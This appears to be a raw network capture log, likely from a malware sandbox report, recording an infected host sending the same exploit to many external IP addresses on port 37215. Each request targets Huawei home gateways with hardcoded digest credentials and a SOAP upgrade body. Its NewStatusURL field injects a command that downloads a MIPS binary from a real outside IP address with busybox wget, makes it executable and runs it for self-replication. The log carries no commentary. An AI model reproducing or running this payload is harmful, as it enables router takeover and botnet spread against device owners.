                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          436192.168.2.2357536120.200.30.11137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.186218023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          437192.168.2.2349276197.44.41.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.186228991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          438192.168.2.235906041.160.107.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187230110 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          439192.168.2.2344044197.40.1.15237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187271118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          440192.168.2.2334960197.240.51.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187324047 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          441192.168.2.2355878197.73.203.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187375069 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          442192.168.2.2345370195.207.112.12137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187381029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          443192.168.2.2337526157.237.106.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187381029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          444192.168.2.234502681.175.159.8837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187423944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          445192.168.2.2335364157.219.88.937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187427044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          446192.168.2.233638839.118.39.14737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.187442064 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
